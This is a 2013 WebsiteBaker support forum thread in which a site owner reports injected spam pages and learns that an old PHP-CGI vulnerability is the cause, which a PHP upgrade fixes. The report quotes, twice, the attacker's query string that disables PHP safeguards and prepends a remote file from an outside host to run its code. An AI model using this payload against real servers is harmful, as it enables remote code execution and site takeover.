Author Topic: Code injection  (Read 4738 times)

Offline scheltel

  • Posts: 48
Code injection
« on: September 28, 2013, 11:59:28 AM »
Hi,

Which version of WebsiteBaker is not vulnerable for code injection?


Offline Argos

  • Posts: 2542
  • Gender: Male
    • Argos Media
Re: Code injection
« Reply #1 on: September 30, 2013, 10:45:00 AM »
I don't know, but I guess using the last version is always the best way to be most secured.
Jurgen Nijhuis
Argos Media
Heiloo, The Netherlands
----------------------------------------------------------------
Please don't request personal support, use the forums!

Offline scheltel

  • Posts: 48
Re: Code injection
« Reply #2 on: September 30, 2013, 10:13:46 PM »
I'm using the most recent version but this version is not very secure....

Query strings like these dynamically generates 10 php pages in a WebsiteBaker site, which are used to send spam:
Code: [Select]
?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A//creativeresinsdistribution.com/wp-content/themes/twentytwelv/work.log

As you can see the query string is able to set safe_mode Off, override the disable_function settings of php and insert malicious code in a WebsiteBaker page.

What can be done the intercept query string like these?


Offline Argos

  • Posts: 2542
  • Gender: Male
    • Argos Media
Re: Code injection
« Reply #3 on: September 30, 2013, 10:19:20 PM »
I'm using the most recent version but this version is not very secure....

Query strings like these dynamically generates 10 php pages in a WebsiteBaker site, which are used to send spam:
Code: [Select]
?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A//creativeresinsdistribution.com/wp-content/themes/twentytwelv/work.log

As you can see the query string is able to set safe_mode Off, override the disable_function settings of php and insert malicious code in a WebsiteBaker page.

What can be done the intercept query string like these?

I don't know, but this topic doesn't belong here. I'll move it to the developers forum.
Jurgen Nijhuis
Argos Media
Heiloo, The Netherlands
----------------------------------------------------------------
Please don't request personal support, use the forums!

Offline DarkViper

  • Forum administrator
  • *****
  • Posts: 2993
  • Gender: Female
Re: Code injection
« Reply #4 on: September 30, 2013, 10:43:06 PM »
I'm using the most recent version but this version is not very secure....
Query strings like these dynamically generates 10 php pages in a WebsiteBaker site, which are used to send spam:
As you can see the query string is able to set safe_mode Off, override the disable_function settings of php and insert malicious code in a WebsiteBaker page.
What can be done the intercept query string like these?

and what we shall do with this code? Pin it at the wall?
There are more then 500 possibilities to call WB. At which of these request your string of args shall be attatched? Which version/revision of WB? Which module and its version? What's the environment of your server?

Please: If you send a true security hint, then do it in a clear, straight and complete way so we can reproduce the issue.

thanks in advance
Manu.

-------------
[edited by admin: it's "which", not "witch" (=evil woman flying around on a broomstick)  :-D ]
« Last Edit: September 30, 2013, 10:46:07 PM by Argos »
Der blaue Planet - er ist nicht unser Eigentum - wir haben ihn nur von unseren Nachkommen geliehen

"You have to take the men as they are… but you can not leave them like that !" :-P
Das tägliche Stoßgebet: Oh Herr, wirf ihnen Hirn vom Himmel !

Offline Ruud

  • Posts: 3647
  • Gender: Male
  • Do not use PM for help! Please use the forum!
    • Dev4Me - Professional WebsiteBaker Development
Re: Code injection
« Reply #5 on: September 30, 2013, 10:48:24 PM »
This is an old security issue of PHP, and has nothing to do with WB.

Have a look here:
http://blog.sucuri.net/2012/05/php-cgi-vulnerability-exploited-in-the-wild.html
http://www.php-security.net/archives/9-New-PHP-CGI-exploit-CVE-2012-1823.html

It is a PHP-CGI vulnerability that should be solved by your host.
Either upgrading to a recent PHP version or changing CGI mode to FastCGI should keep you protected in the future.

[edit: added an extra link with details]
« Last Edit: September 30, 2013, 10:58:09 PM by Ruud »

Offline scheltel

  • Posts: 48
Re: Code injection
« Reply #6 on: September 30, 2013, 11:10:28 PM »
The query string is attached after het main index.php e.g. http://www.mywebsitebaker.com/index.php

The version of WebsiteBaker is: 2.8.3 [R1638] SP1
Server version: Windows 2008 completely patched
PHP: 5.2.17.17



Offline scheltel

  • Posts: 48
Re: Code injection
« Reply #7 on: September 30, 2013, 11:13:19 PM »
Ruud, the problem was the PHP version (5.2.17.17). After updating PHP to version 5.3.27 the malicious code in query string is ignored.

Offline Ruud

  • Posts: 3647
  • Gender: Male
  • Do not use PM for help! Please use the forum!
    • Dev4Me - Professional WebsiteBaker Development
Re: Code injection
« Reply #8 on: September 30, 2013, 11:24:32 PM »
Ruud, the problem was the PHP version (5.2.17.17). After updating PHP to version 5.3.27 the malicious code in query string is ignored.
The bug is tracked back to 2004 in PHP, but only in (the outdated) CGI mode.
One more reason to keep systems updated..

A message to all (future) readers of this thread:


If you feel your website is hacked because of a possible security issue, please use one of the report forms here:
http://www.WebsiteBaker.org/en/community/security-issues.php

 

postern-length